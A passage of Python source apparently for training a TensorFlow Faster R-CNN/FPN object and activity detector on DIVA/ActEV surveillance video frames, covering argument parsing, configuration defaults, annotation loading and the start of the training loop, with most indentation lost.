parser.add_argument("--use_small_object_head", action="store_true")
parser.add_argument("--use_so_score_thres", action="store_true", help="use score threshold before final nms")
parser.add_argument("--oversample_so_img", action="store_true")
parser.add_argument("--oversample_x", type=int, default=1, help="x + 1 times")
parser.add_argument("--skip_no_so_img", action="store_true")
parser.add_argument("--skip_no_object", default=None,help="'Bike', single object annotation filter")
parser.add_argument("--so_outpath",default=None)
parser.add_argument("--use_so_association", action="store_true")
parser.add_argument("--so_person_topk",type=int,default=10)
parser.add_argument("--freeze_rpn", action="store_true")
parser.add_argument("--freeze_fastrcnn", action="store_true")
parser.add_argument("--use_dilations", action="store_true", help="use dilations=2 in res5")
parser.add_argument("--use_deformable", action="store_true", help="use dilations=2 in res5")
parser.add_argument("--fpn_frcnn_fc_head_dim",type=int,default=1024)
parser.add_argument("--fpn_num_channel",type=int,default=256)
parser.add_argument("--freeze",type=int,default=0,help="freeze backbone resnet until group 0|2")
parser.add_argument("--finer_resolution",action="store_true",help="fpn use finer resolution conv")
parser.add_argument("--add_relation_nn",action="store_true",help="add relation network feature")
parser.add_argument("--focal_loss",action="store_true",help="use focal loss for RPN and FasterRCNN loss, instead of cross entropy")
# for test mode on testing on the MSCOCO dataset, if not set this, will use our evaluation script
parser.add_argument("--use_coco_eval",action="store_true")
parser.add_argument("--coco2014_to_2017",action="store_true",help="if use the cocoval 2014 json and use val2017 filepath, need this option to get the correct file path")
# this will alter some parameter in tf.pad in resnet bottleneck and resnet conv4,
## In tensorpack model zoo, ResNet models with TF_PAD_MODE=False are marked with "-AlignPadding".
# All other models under `ResNet/` in the model zoo are trained with TF_PAD_MODE=True.
# _C.BACKBONE.TF_PAD_MODE = False
#parser.add_argument("--new_tensorpack_model",action="store_true",help="for new tensorpack model, the fast rcnn box logit has num_class instead of num_class-1, and some padding is different")
parser.add_argument("--trainlst",type=str,default=None,help="training frame name list,")
parser.add_argument("--valframepath",type=str,default=None,help="path to top frame path")
parser.add_argument("--annopath",type=str,default=None,help="path to annotation, each frame.npz")
parser.add_argument("--valannopath",type=str,default=None,help="path to annotation, each frame.npz")
parser.add_argument("--flip_image",action="store_true",help="for training, whether to random horizontal flipping for input image, maybe not for surveillance video")
parser.add_argument("--add_mask",action="store_true")
parser.add_argument("--vallst",type=str,default=None,help="validation for training")
parser.add_argument("--load",action="store_true")
parser.add_argument("--load_best",action="store_true")
parser.add_argument("--skip_first_eval",action="store_true")
parser.add_argument("--best_first",type=float,default=None)
parser.add_argument("--force_first_eval",action="store_true")
parser.add_argument("--no_skip_error",action="store_true")
parser.add_argument("--show_stat",action="store_true",help="show data distribution only")
# use for pre-trained model
parser.add_argument("--load_from",type=str,default=None)
parser.add_argument("--ignore_vars",type=str,default=None,help="variables to ignore, multiple seperate by : like: logits/W:logits/b, this var only need to be var name's sub string to ignore")
parser.add_argument("--print_params",action="store_true",help="print params and then exit")
parser.add_argument("--show_restore",action="store_true",help="load from existing model (npz), show the weight that is restored")
# -------------------- save model for deployment
parser.add_argument("--is_pack_model",action="store_true",default=False,help="with is_test, this will pack the model to a path instead of testing")
parser.add_argument("--pack_model_path",type=str,default=None,help="path to save model, a .pb file")
parser.add_argument("--note",type=str,default=None,help="leave a note for this packed model for future reference")
parser.add_argument("--pack_modelconfig_path", type=str, default=None, help="json file to save the config and note")
# forward with frozen gragp
parser.add_argument("--is_load_from_pb", action="store_true")
# ------------------------------------ model specifics
# ----------------------------------training detail
parser.add_argument("--use_all_mem",action="store_true")
parser.add_argument('--im_batch_size',type=int,default=1)
parser.add_argument("--rpn_batch_size",type=int,default=256,help="num roi per image for RPN training")
parser.add_argument("--frcnn_batch_size",type=int,default=512,help="num roi per image for fastRCNN training")
parser.add_argument("--rpn_test_post_nms_topk",type=int,default=1000,help="test post nms, input to fast rcnn")
  # fastrcnn output NMS suppresses boxes with iou >= this threshold
parser.add_argument("--fastrcnn_nms_iou_thres",type=float,default=0.5)
parser.add_argument("--max_size",type=int,default=1333,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--short_edge_size",type=int,default=800,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--scale_jitter",action="store_true",help="if set this, will random get int from min to max to resize image;original param will still be used in testing")
parser.add_argument("--short_edge_size_min",type=int,default=640,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--short_edge_size_max",type=int,default=800,help="num roi per image for RPN and fastRCNN training")
# ------------------------------mixup training
parser.add_argument("--use_mixup", action="store_true")
parser.add_argument("--use_constant_mixup_weight", action="store_true")
parser.add_argument("--mixup_constant_weight", type=float, default=0.5)
parser.add_argument("--mixup_chance", type=float, default=0.5, help="the possibility of using mixup")
parser.add_argument("--max_mixup_per_frame", type=int, default=15)
# not used for fpn
parser.add_argument("--small_anchor_exp",action="store_true")
parser.add_argument("--positive_anchor_thres",default=0.7,type=float)
parser.add_argument("--negative_anchor_thres",default=0.3,type=float)
parser.add_argument("--fastrcnn_fg_ratio",default=0.25,type=float)
parser.add_argument("--gpu",default=1,type=int,help="number of gpu")
parser.add_argument("--gpuid_start",default=0,type=int,help="start of gpu id")
parser.add_argument("--model_per_gpu",default=1,type=int,help="it will be set as a /task:k in device")
parser.add_argument("--controller",default="/cpu:0",help="controller for multigpu training")
#parser.add_argument("--num_step",type=int,default=360000)
parser.add_argument("--num_epochs",type=int,default=12)
parser.add_argument("--save_period",type=int,default=5000,help="num steps to save model and eval")
# drop out rate
parser.add_argument('--keep_prob',default=1.0,type=float,help="1.0 - drop out rate;remember to set it to 1.0 in eval")
# l2 weight decay
parser.add_argument("--wd",default=None,type=float)# 0.0001
parser.add_argument("--init_lr",default=0.1,type=float,help=("start learning rate"))
parser.add_argument("--use_lr_decay",action="store_true")
parser.add_argument("--learning_rate_decay",default=0.94,type=float,help=("learning rate decay"))
#parser.add_argument("--learning_rate_decay_examples",default=1000000,type=int,help=("how many sample to have one decay"))
parser.add_argument("--num_epoch_per_decay",default=2.0,type=float,help=("how epoch after which lr decay"))
parser.add_argument("--use_cosine_schedule",action="store_true")
parser.add_argument("--use_exp_schedule",action="store_true")
parser.add_argument("--warm_up_steps",default=3000,type=int,help=("warm up steps not epochs"))
parser.add_argument("--same_lr_steps",default=0,type=int,help=("after warm up, keep the init_lr for k steps"))
parser.add_argument("--optimizer",default="adam",type=str,help="optimizer: adam/adadelta")
parser.add_argument("--momentum",default=0.9,type=float)
parser.add_argument("--result_score_thres",default=0.0001,type=float)
parser.add_argument("--result_per_im",default=100,type=int)
# clipping, suggest 100.0
parser.add_argument("--clip_gradient_norm",default=None,type=float,help=("norm to clip gradient to"))
# for debug
parser.add_argument("--vis_pre",action="store_true",help="visualize preprocess images")
parser.add_argument("--vis_path",default=None)
# for efficient use of COCO model classes
parser.add_argument("--use_partial_classes", action="store_true")
args = parser.parse_args()
if args.use_cosine_schedule:
args.use_lr_decay = True
if args.use_exp_schedule:
args.use_lr_decay = True
args.use_cosine_schedule = False
if args.save_all_box:
args.no_nms = True
if args.no_nms:
args.use_cpu_nms = True # so to avoid using TF nms in the graph
assert args.model_per_gpu == 1, "not work yet!"
assert args.gpu*args.model_per_gpu == args.im_batch_size # one gpu one image
#args.controller = "/cpu:0" # parameter server
# if args.add_act:
# assert len(targetAct2id) == args.num_act_class, (len(targetAct2id),args.num_act_class)
# assert len(targetSingleAct2id) == args.num_act_single_class, (len(targetSingleAct2id), args.num_act_single_class)
# assert len(targetPairAct2id) == args.num_act_pair_class
targetid2class = targetid2class
targetClass2id = targetClass2id
args.small_objects = ["Prop", "Push_Pulled_Object", "Prop_plus_Push_Pulled_Object", "Bike"]
if args.use_small_object_head:
assert args.merge_prop
args.so_eval_target = {c:1 for c in args.small_objects}
args.small_objects_targetClass2id = {c:i for i,c in enumerate(["BG"] + args.small_objects)}
args.small_objects_targetid2class = {args.small_objects_targetClass2id[one]:one for one in args.small_objects_targetClass2id}
if args.merge_prop:
targetClass2id = targetClass2id_mergeProp
targetid2class = {targetClass2id_mergeProp[one]:one for one in targetClass2id_mergeProp}
if args.diva_class2:
targetClass2id = targetClass2id_new
targetid2class = {targetClass2id_new[one]:one for one in targetClass2id_new}
if args.diva_class3:
targetClass2id = targetClass2id_new_nopo
targetid2class = {targetClass2id_new_nopo[one]:one for one in targetClass2id_new_nopo}
args.classname2id = targetClass2id
args.classid2name = targetid2class
if args.act_as_obj:
# replace the obj class with actitivy class
targetClass2id = targetAct2id
targetid2class = {targetAct2id[one]:one for one in targetAct2id}
if args.bupt_exp:
args.diva_class = True
args.act_as_obj = True
targetClass2id = targetAct2id_bupt
targetid2class = {targetAct2id_bupt[one]:one for one in targetAct2id_bupt}
if args.meva_exp:
args.diva_class = True
args.act_as_obj = True
targetClass2id = targetAct2id_meva
targetid2class = {targetAct2id_meva[one]:one for one in targetAct2id_meva}
if args.is_coco_model:
assert args.mode == "forward" or args.mode == "pack"
args.diva_class = False
targetClass2id = coco_obj_class_to_id
targetid2class = coco_obj_id_to_class
if args.use_partial_classes:
assert args.is_coco_model
args.partial_classes = [classname for classname in coco_obj_to_actev_obj]
args.classname2id = targetClass2id
args.classid2name = targetid2class
if not args.tococo:
assert len(targetid2class) == args.num_class
if not args.tococo and ((args.mode == "train") or (args.mode == "test")):
assert args.num_class == len(targetid2class.keys())
args.class_names = targetClass2id.keys()
if args.vis_pre:
assert args.vis_path is not None
if not os.path.exists(args.vis_path):
os.makedirs(args.vis_path)
if args.add_act and (args.mode == "forward"):
assert args.actoutbasepath is not None
mkdir(args.actoutbasepath)
if args.outbasepath is not None:
mkdir(args.outbasepath)
if args.skip_first_eval:
assert args.best_first is not None
if (args.outbasepath is not None) and (args.modelname is not None):
args.outpath = os.path.join(args.outbasepath,args.modelname,str(args.runId).zfill(2))
args.save_dir = os.path.join(args.outpath, "save")
args.save_dir_best = os.path.join(args.outpath, "save-best")
args.write_self_sum = True
args.self_summary_path = os.path.join(args.outpath,"train_sum.txt")
args.stats_path = os.path.join(args.outpath,"stats.json")# path to save each validation step's performance and loss
args.mrcnn_head_dim = 256
args.no_obj_detect = False
if args.mode == "videofeat":
args.no_obj_detect = True
#if args.is_cascade_rcnn:
# assert args.is_fpn
# args.cascade_num_stage = 3
# args.cascade_ious = [0.5, 0.6, 0.7]
# args.cascade_bbox_reg = [[10., 10., 5., 5.], [20., 20., 10., 10.], [30., 30., 15., 15.]]
args.anchor_stride = 16 # has to be 16 to match the image feature total stride
args.anchor_sizes = (32, 64, 128, 256, 512)
if args.small_anchor_exp:
args.anchor_sizes = (16, 32, 64, 96,128, 256) # not used for fpn
if args.is_fpn:
args.anchor_strides = (4, 8, 16, 32, 64)
  # we will pad H,W to be evenly divisible by 32
args.fpn_resolution_requirement = float(args.anchor_strides[3]) # [3] is 32, since there is a total pixel reduce of 2x2x2x2x2
args.max_size = np.ceil(args.max_size / args.fpn_resolution_requirement) * args.fpn_resolution_requirement
#args.fpn_num_channel = 256
#args.fpn_frcnn_fc_head_dim = 1024
if args.load_best:
args.load = True
if args.load_from is not None:
args.load = True
if args.mode == "train":
assert args.outbasepath is not None
assert args.modelname is not None
args.is_train = True
mkdir(args.save_dir)
mkdir(args.save_dir_best)
else:
args.is_train = False
args.num_epochs = 1
if args.get_rpn_out:
if not os.path.exists(args.rpn_out_path):
os.makedirs(args.rpn_out_path)
# ---- all the mask rcnn config
args.resnet_num_block = [3, 4, 23, 3] # resnet 101
args.use_basic_block = False # for resnet-34 and resnet-18
if args.resnet152:
args.resnet_num_block = [3, 8, 36, 3]
if args.resnet50:
args.resnet_num_block = [3, 4, 6, 3]
if args.resnet34:
args.resnet_num_block = [3, 4, 6, 3]
args.use_basic_block = True
if args.resnet18:
args.resnet_num_block = [2, 2, 2, 2]
args.use_basic_block = True
#args.short_edge_size = 800
#args.max_size = 1333
args.anchor_ratios = (0.5, 1, 2)
args.num_anchors = len(args.anchor_sizes) * len(args.anchor_ratios)
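    # e.g. with the 5 anchor sizes and 3 ratios above this is 15 anchor shapes per feature-map location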
# iou thres to determine anchor label
#args.positive_anchor_thres = 0.7
#args.negative_anchor_thres = 0.3
# when getting region proposal, avoid getting too large boxes
args.bbox_decode_clip = np.log(args.max_size / 16.0)
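    # e.g. with max_size around 1333 this is log(1333/16) ~= 4.4; clipping the predicted dw/dh there keeps decoded boxes from exp()-ing past roughly the image size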
# RPN training
args.rpn_fg_ratio = 0.5
args.rpn_batch_per_im = args.rpn_batch_size
args.rpn_min_size = 0 # 8?
args.rpn_proposal_nms_thres = 0.7
args.rpn_train_pre_nms_topk = 12000 # not used in fpn
args.rpn_train_post_nms_topk = 2000# this is used for fpn_nms_pre
# fastrcnn
args.fastrcnn_batch_per_im = args.frcnn_batch_size
args.fastrcnn_bbox_reg_weights = np.array([10, 10, 5, 5], dtype='float32')
#args.fastrcnn_bbox_reg_weights = np.array([20, 20, 10, 10], dtype='float32')
args.fastrcnn_fg_thres = 0.5 # iou thres
#args.fastrcnn_fg_ratio = 0.25 # 1:3 -> pos:neg
# testing
args.rpn_test_pre_nms_topk = 6000
#args.rpn_test_post_nms_topk = 700 #1300 # 700 takes 40 hours, # OOM at 1722,28,28,1024 # 800 OOM for gpu4
#args.fastrcnn_nms_thres = 0.5
#args.fastrcnn_nms_iou_thres = 0.5 # 0.3 is worse
#args.result_score_thres = 0.0001
#args.result_per_im = 100 # 400 # 100
if args.focal_loss and args.clip_gradient_norm is None:
print("Focal loss needs gradient clipping or will have NaN loss")
sys.exit()
return args
def add_coco(config,datajson):
coco = COCO(datajson)
cat_ids = coco.getCatIds() #[80], each is 1-90
cat_names = [c['name'] for c in coco.loadCats(cat_ids)] # [80]
config.classId_to_cocoId = {(i+1):v for i,v in enumerate(cat_ids)}
config.class_names = ["BG"] + cat_names
config.class_to_classId = {c:i for i,c in enumerate(config.class_names)} # 0-80
config.classId_to_class = {i:c for i,c in enumerate(config.class_names)}
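    # e.g. for the standard 80-class COCO json this gives classId 1 -> cocoId 1 ("person"), and class_names has 81 entries with "BG" at index 0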
# load all ground truth into memory
def read_data_diva(config, idlst, framepath, annopath, tococo=False, randp=None, is_train=False):
assert idlst is not None
assert framepath is not None
assert annopath is not None
assert len(targetid2class.keys()) == config.num_class
# load the coco class name to classId so we could convert the label name to label classId
if tococo:
add_coco(config,config.datajson)
imgs = [os.path.splitext(os.path.basename(line.strip()))[0] for line in open(idlst,"r").readlines()]
if randp is not None:
imgs = random.sample(imgs,int(len(imgs)*randp))
data = {"imgs":[], "gt":[]}
if config.use_mixup and is_train:
data['mixup_weights'] = []
print("loading data..")
if config.print_params:
imgs = imgs[:100]
    # in the diva dataset, some classes may be ignored
ignored_classes = {}
targetClass2exist = {classname:0 for classname in targetClass2id}
num_empty_actboxes = 0
targetAct2exist = {classname:0 for classname in targetAct2id}
ignored_act_classes = {}
num_empty_single_actboxes = 0
ignored_single_act_classes = {}
targetAct2exist_single = {classname:0 for classname in targetSingleAct2id}
act_single_fgratio = []
if config.debug:
imgs = imgs[:1000]
if (config.train_skip > 1) and is_train:
imgs.sort()
ori_num = len(imgs)
imgs = imgs[config.train_skip_offset::config.train_skip]
print("skipping [%s::%s], got %s/%s"%(config.train_skip_offset,config.train_skip,len(imgs),ori_num))
if (config.val_skip > 1) and not is_train:
imgs.sort()
ori_num = len(imgs)
imgs = imgs[config.val_skip_offset::config.val_skip]
print("skipping [%s::%s], got %s/%s"%(config.val_skip_offset,config.val_skip,len(imgs),ori_num))
    # gather stats per image: the per-class box-count (label) distribution
label_dist = {classname:[] for classname in targetClass2id} # class -> [] num_box in each image
label_dist_all = []
for img in tqdm(imgs, ascii=True, smoothing=0.5):
anno = os.path.join(annopath,"%s.npz"%img)
videoname = img.strip().split("_F_")[0]
if not os.path.exists(anno):
continue
if config.check_img_exist:
if not os.path.exists(os.path.join(framepath, videoname, "%s.jpg"%img)):
continue
anno = dict(np.load(anno, allow_pickle=True)) # 'boxes' -> [K,4]
# boxes are x1,y1,x2,y2
original_box_num = len(anno['boxes'])
# feed act box as object boxes
if config.act_as_obj:
anno['labels'] = anno['actlabels']
anno['boxes'] = anno['actboxes']
# labels are one word, diva classname
labels = []
boxes = []
no_so_box = True
no_object = True
for i,classname in enumerate(list(anno['labels'])):
if classname in targetClass2id or (
config.bupt_exp and classname in bupt_act_mapping) or (
config.meva_exp and classname in meva_act_mapping):
if config.bupt_exp and classname in bupt_act_mapping:
classname = bupt_act_mapping[classname]
if config.meva_exp and classname in meva_act_mapping:
classname = meva_act_mapping[classname]
targetClass2exist[classname] = 1
labels.append(targetClass2id[classname])
boxes.append(anno['boxes'][i])
else:
ignored_classes[classname] = 1
if classname in config.small_objects:
no_so_box=False
if config.skip_no_object is not None:
if classname == config.skip_no_object:
no_object = False
if config.use_mixup and is_train:
mixup_boxes = []
mixup_labels = []
for i, classname in enumerate(list(anno['mixup_labels'])[:config.max_mixup_per_frame]):
                if classname in targetClass2id:
# not adding now, during run time will maybe add them
#labels.append(targetClass2id[classname])
#boxes.append(anno['mixup_boxes'][i])
mixup_boxes.append(anno['mixup_boxes'][i])
mixup_labels.append(targetClass2id[classname])
anno['mixup_boxes'] = np.array(mixup_boxes, dtype="float32")
anno['mixup_labels'] = mixup_labels
anno['boxes'] = np.array(boxes,dtype="float32")
anno['labels'] = labels
#assert len(anno['boxes']) > 0
if len(anno['boxes']) == 0:
continue
if config.skip_no_so_img and is_train:
if no_so_box:
continue
if config.skip_no_object and is_train:
if no_object:
continue
assert len(anno['labels']) == len(anno['boxes']), (anno['labels'], anno['boxes'])
assert anno['boxes'].dtype == np.float32
if config.oversample_so_img and is_train and not no_so_box:
            for i in range(config.oversample_x):
data['imgs'].append(os.path.join(framepath, videoname, "%s.jpg"%img))
data['gt'].append(anno)
        # statistics
if config.show_stat:
for classname in label_dist:
num_box_this_img = len([l for l in labels if l == targetClass2id[classname]])
label_dist[classname].append(num_box_this_img)
label_dist_all.append(len(labels))
if config.add_act:
# for activity anno, we couldn't remove any of the boxes
assert len(anno['boxes']) == original_box_num
if config.act_v2:
# make multi class labels
# BG class is at index 0
K = len(anno['boxes'])
actSingleLabels = np.zeros((K,config.num_act_single_class),dtype="uint8")
# use this to mark BG
hasClass = np.zeros((K),dtype="bool")
for i,classname in enumerate(list(anno['actSingleLabels'])):
                    if classname in targetSingleAct2id:
targetAct2exist_single[classname] = 1
act_id = targetSingleAct2id[classname]
box_id = anno['actSingleIdxs'][i]
assert box_id >=0 and box_id < K
actSingleLabels[box_id,act_id] = 1
hasClass[box_id] = True
else:
ignored_single_act_classes[classname] = 1
                # mark as BG the boxes that have no activity annotation
actSingleLabels[np.logical_not(hasClass), 0] = 1
anno['actSingleLabels_npy'] = actSingleLabels
# compute the BG vs FG ratio for the activity boxes
act_single_fgratio.append(sum(hasClass)/float(K))
if sum(hasClass) == 0:
num_empty_single_actboxes+=1
continue
else:
act_labels = []
act_good_ids = []
for i,classname in enumerate(list(anno['actlabels'])):
                    if classname in targetAct2id:
targetAct2exist[classname] = 1
act_labels.append(targetAct2id[classname])
act_good_ids.append(i)
else:
ignored_act_classes[classname] = 1
#print anno['actboxes'].shape
if anno['actboxes'].shape[0] == 0:# ignore this image
num_empty_actboxes+=1
continue
anno['actboxes'] = anno['actboxes'][act_good_ids]
anno['actboxidxs'] = anno['actboxidxs'][act_good_ids] # it is a npy array of python list, so no :
anno['actlabels'] = act_labels
assert len(anno['actboxes']) == len(anno['actlabels'])
if config.use_mixup and is_train:
# the training lst and annotation is framename_M_framename.npz files
framename1, framename2 = img.strip().split("_M_")
videoname1 = framename1.strip().split("_F_")[0]
videoname2 = framename2.strip().split("_F_")[0]
data['imgs'].append((os.path.join(framepath, videoname1,"%s.jpg"%framename1), os.path.join(framepath, videoname2,"%s.jpg"%framename2)))
data['gt'].append(anno)
weight = np.random.beta(1.5, 1.5)
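            # np.random.beta(1.5, 1.5) is symmetric around 0.5, so on average the two mixed frames get similar weights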
if config.use_constant_mixup_weight:
weight = config.mixup_constant_weight
data['mixup_weights'].append(weight)
else:
data['imgs'].append(os.path.join(framepath,videoname,"%s.jpg"%img))
data['gt'].append(anno)
print("loaded %s/%s data"%(len(data['imgs']),len(imgs)))
if config.show_stat:
for classname in label_dist:
d = label_dist[classname]
ratios = [a/float(b) for a,b in zip(d, label_dist_all)]
print("%s, [%s - %s], median %s per img, ratio:[%.3f - %.3f], median %.3f, no label %s/%s [%.3f]"%(classname, min(d), max(d), np.median(d), min(ratios), max(ratios), np.median(ratios), len([i for i in d if i==0]), len(d),len([i for i in d if i==0])/float(len(d))))
print("each img has boxes: [%s - %s], median %s"%(min(label_dist_all),max(label_dist_all),np.median(label_dist_all),))
if len(ignored_classes) > 0:
print("ignored %s "%(ignored_classes.keys()))
noDataClasses = [classname for classname in targetClass2exist if targetClass2exist[classname] ==0]
if len(noDataClasses) > 0:
print("warning: class data not exists: %s, AR will be 1.0 for these"%(noDataClasses))
if config.add_act:
if config.act_v2:
print(" each frame positive act box percentage min %.4f, max %.4f, mean %.4f"%(min(act_single_fgratio),max(act_single_fgratio),np.mean(act_single_fgratio)))
if len(ignored_single_act_classes) > 0:
print("ignored activity %s"%(ignored_single_act_classes.keys()))
print("%s/%s has no single activity boxes"%(num_empty_single_actboxes, len(data['imgs'])))
noDataClasses = [classname for classname in targetAct2exist_single if targetAct2exist_single[classname] ==0]
if len(noDataClasses) > 0:
print("warning: single activity class data not exists: %s, "%(noDataClasses))
else:
if len(ignored_act_classes) > 0:
print("ignored activity %s"%(ignored_act_classes.keys()))
print("%s/%s has no activity boxes"%(num_empty_actboxes, len(data['imgs'])))
noDataClasses = [classname for classname in targetAct2exist if targetAct2exist[classname] ==0]
if len(noDataClasses) > 0:
print("warning: activity class data not exists: %s, "%(noDataClasses))
return Dataset(data,add_gt=True)
# given the gen_gt_diva
# train on diva dataset
def train_diva(config):
global eval_target,targetid2class,targetClass2id
eval_target_weight = None
if config.diva_class:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
eval_target = ["Vehicle","Person","Prop","Push_Pulled_Object","Bike"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={
"Person":0.15,
"Vehicle":0.15,
"Prop":0.15,
"Push_Pulled_Object":0.15,
"Bike":0.15,
}
if config.merge_prop:
eval_target = ["Vehicle","Person","Prop","Push_Pulled_Object","Bike", "Prop_plus_Push_Pulled_Object"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={
"Person":0.15,
"Vehicle":0.15,
"Prop_plus_Push_Pulled_Object":0.2,
"Bike":0.2,
"Prop":0.15,
"Push_Pulled_Object":0.15,
}
if config.diva_class2:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike", "Construction_Vehicle", "Bike_Person", "Prop_Person", "Skateboard_Person"]
eval_target = {one:1 for one in eval_target}
eval_target_weight = {one:1.0/len(eval_target) for one in eval_target}
if config.diva_class3:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
#eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike", "Construction_Vehicle"]
# removed construction vehicle 03/2019
eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike"]
eval_target = {one:1 for one in eval_target}
eval_target_weight = {one:1.0/len(eval_target) for one in eval_target}
if config.add_act:
# same for single box act
act_eval_target = ["vehicle_turning_right","vehicle_turning_left","Unloading","Transport_HeavyCarry","Opening","Open_Trunk","Loading","Exiting","Entering","Closing_Trunk","Closing","Interacts","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"] # "vehicle_u_turn" is not used since not exists in val set
act_eval_target = {one:1 for one in act_eval_target}
act_eval_target_weight ={one:1.0/len(act_eval_target) for one in act_eval_target}
if config.act_as_obj:
eval_target = ["vehicle_turning_right","vehicle_turning_left","Unloading","Transport_HeavyCarry","Opening","Open_Trunk","Loading","Exiting","Entering","Closing_Trunk","Closing","Interacts","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"] # "vehicle_u_turn" is not used since not exists in val set
if config.bupt_exp:
eval_target = ["Person-Vehicle", "Vehicle-Turning", "Transport_HeavyCarry","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"]
if config.meva_exp:
eval_target = ["Person-Vehicle", "Vehicle-Turning", "Person-Structure",
"Person_Heavy_Carry", "People_Talking", "Riding",
"Person_Sitting_Down", "Person_Sets_Down_Object"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={one:1.0/len(eval_target) for one in eval_target}
self_summary_strs = Summary()
stats = [] # tuples with {"metrics":,"step":,}
# load the frame count data first
train_data = read_data_diva(config,config.trainlst,config.imgpath,config.annopath,tococo=False,is_train=True) # True to filter data
val_data = read_data_diva(config,config.vallst,config.valframepath,config.valannopath,tococo=False)#,randp=0.02)
config.train_num_examples = train_data.num_examples
if config.show_stat:
sys.exit()
# the total step (iteration) the model will run
num_steps = int(math.ceil(train_data.num_examples/float(config.im_batch_size)))*config.num_epochs
num_val_steps = int(math.ceil(val_data.num_examples/float(config.im_batch_size)))*1
#config_vars = vars(config)
#self_summary_strs.add("\t"+ " ,".join(["%s:%s"%(key,config_vars[key]) for key in config_vars]))
# model_per_gpu > 1 not work yet, need to set distributed computing
#cluster = tf.train.ClusterSpec({"local": ["localhost:8000","localhost:8001"]})
#server = tf.train.Server(cluster, job_name="local", task_index=0)
#server = tf.train.Server(cluster, job_name="local", task_index=1)
# two model, this is the lazy way
#model = get_model(config) # input is image paths
models = []
    gpuids = list(range(config.gpuid_start, config.gpuid_start+config.gpu))
    gpuids = gpuids * config.model_per_gpu
    # example: model_per_gpu=2, gpu=2, gpuid_start=0
    gpuids.sort()  # [0,0,1,1]
    taskids = list(range(config.model_per_gpu)) * config.gpu  # [0,1,0,1]
for i,j in zip(gpuids,taskids):
models.append(get_model(config,gpuid=i,task=j,controller=config.controller))
config.is_train=False
models_eval = []
for i,j in zip(gpuids,taskids):
models_eval.append(get_model(config,gpuid=i,task=j,controller=config.controller))
config.is_train=True
trainer = Trainer(models,config)
tester = Tester(models_eval,config,add_mask=config.add_mask) # need final box and stuff?
saver = tf.train.Saver(max_to_keep=5) # how many model to keep
bestsaver = tf.train.Saver(max_to_keep=5) # just for saving the best model
# start training!
    # allow_soft_placement: tf will automatically fall back to another device if the one requested in tf.device(*) is not available
tfconfig = tf.ConfigProto(allow_soft_placement=True)#,log_device_placement=True)
if not config.use_all_mem:
        tfconfig.gpu_options.allow_growth = True # only allocate the necessary GPU memory instead of grabbing it all
tfconfig.gpu_options.visible_device_list = "%s"%(",".join(["%s"%i for i in range(config.gpuid_start, config.gpuid_start+config.gpu)])) # so only this gpu will be used
#print tfconfig.gpu_options.visible_device_list
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.4
with tf.Session(config=tfconfig) as sess:
self_summary_strs.add("total parameters: %s"%(cal_total_param()))
initialize(load=config.load,load_best=config.load_best,config=config,sess=sess)
if config.print_params:
for var in tf.global_variables():
not_show=False
for c in ["Adam","beta1_power","beta2_power","Adam_1","Adadelta_1","Adadelta","Momentum"]:
if c in var.name:
not_show=True
if not_show:
continue
shape = var.get_shape()
print("%s %s\n"%(var.name,shape))
sys.exit()
isStart = True
best = (-1.0,1)
        loss_me, wd_me, rpn_label_loss_me, rpn_box_loss_me, fastrcnn_label_loss_me, fastrcnn_box_loss_me, so_label_loss_me, act_loss_me, lr_me = [FIFO_ME(config.loss_me_step) for i in range(9)]
for batch in tqdm(train_data.get_batches(config.im_batch_size,num_batches=num_steps),total=num_steps,ascii=True,smoothing=1):
global_step = sess.run(models[0].global_step) + 1 # start from 0 or the previous step
validation_performance = None
if (global_step % config.save_period == 0) or (config.load and isStart and ((config.ignore_vars is None) or config.force_first_eval)): # time to save model
tqdm.write("step:%s/%s (epoch:%.3f)"%(global_step,num_steps,(config.num_epochs*global_step/float(num_steps))))
tqdm.write("\tsaving model %s..."%global_step)
saver.save(sess,os.path.join(config.save_dir,"model"),global_step=global_step)
tqdm.write("\tdone")
if config.skip_first_eval and isStart:
tqdm.write("skipped first eval...")
validation_performance = config.best_first
else:
e = {one:{} for one in eval_target.keys()} # cat_id -> imgid -> {"dm","dscores"}
if config.add_act:
e_act = {one:{} for one in act_eval_target.keys()}
if config.use_small_object_head:
e_so = {one:{} for one in config.so_eval_target.keys()}
for val_batch_ in tqdm(val_data.get_batches(config.im_batch_size,num_batches=num_val_steps,shuffle=False),total=num_val_steps,ascii=True,smoothing=1):
batch_idx,val_batches = val_batch_
this_batch_num = len(val_batches)
                        # multiple images at a time for parallel inference across multiple GPUs
scales = []
imgids = []
for val_batch in val_batches:
# load the image here and resize
image = cv2.imread(val_batch.data['imgs'][0],cv2.IMREAD_COLOR)
imgid = os.path.splitext(os.path.basename(val_batch.data['imgs'][0]))[0]
imgids.append(imgid)
assert image is not None,image
image = image.astype("float32")
val_batch.data['imgdata'] = [image]
resized_image = resizeImage(image,config.short_edge_size,config.max_size)
                            # remember the scale and original image
ori_shape = image.shape[:2]
#print(image.shape, resized_image.shape
# average H/h and W/w ?
scale = (resized_image.shape[0]*1.0/image.shape[0] + resized_image.shape[1]*1.0/image.shape[1])/2.0
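                            # scale maps original -> resized coordinates; detection boxes are divided by it later to map back to the original image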
val_batch.data['resized_image'] = [resized_image]
scales.append(scale)
outputs = tester.step(sess,val_batch_)
# post process this batch, also remember the ground truth
                        for i in range(this_batch_num): # num gpu
imgid = imgids[i]
scale = scales[i]
if config.add_act:
if config.act_v2:
